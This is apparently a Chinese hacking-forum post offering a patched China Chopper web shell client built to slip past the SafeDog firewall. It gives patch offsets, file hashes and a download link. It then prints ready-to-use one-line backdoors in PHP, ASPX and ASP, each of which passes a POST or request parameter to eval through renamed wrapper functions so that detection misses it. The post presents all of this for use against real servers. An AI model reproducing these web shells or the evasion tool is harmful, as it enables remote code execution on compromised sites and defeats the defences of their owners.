4A14EC-4A154E是用汇编实现的替换eval和base64_decode的函数
004A1562则是这次更新绕过安全狗中国菜刀的内容47A604填0
说明:
基于原版中国菜刀20100928的hash
- 文件: D:\中国菜刀\chopper.exe
- 大小: 200192 字节
- 修改时间: 2012年10月20日, 23:11:06
- MD5: C05D44DBE353525F492208D891B53875
- SHA1: 3D47EA978228DC27AC1F35DE8DE48DFB55FFFDBF
- CRC32: 4C1B68CC
修改后的hash
- 文件: D:\中国菜刀\chopper_gai.exe
- 大小: 200192 字节
- 修改时间: 2015年4月16日, 15:16:23
- MD5: BE4B29F345BCE7421683C99ABA0E75F6
- SHA1: 28E6958A3E095F048F4DC399C53891544E9B2818
- CRC32: 54025CC8
总共修改了将近200个字节,因为用的原版的空隙来使用,大小都是200192 字节,所以放心使用。(出自习科某牛)
下载地址:http://pan.baidu.com/s/1kTGHYf1
下面是相关的一句话
Php:
- <?php
- function xxxx($str){return eval($str);}
- function yyyyyyyyyyyyy($str){returnbase64_decode($str);}
- xxxx($_POST['pass']); ?>
aspx:
- <%@ Page Language="Jscript"validateRequest="false" %>
- <%function xxxx(str){returneval(str,"unsafe");}%>
- <%var a = Request.Item["ee"];%>
- <%var b = xxxx(a);%>
- <%Response.Write(b);%>
Asp:
- <%
- Function xxxx(str)
- eval str
- End Function
- D = request("pass")
- xxxx D
- %>
内容源自网络,请谨慎使用,后果自付。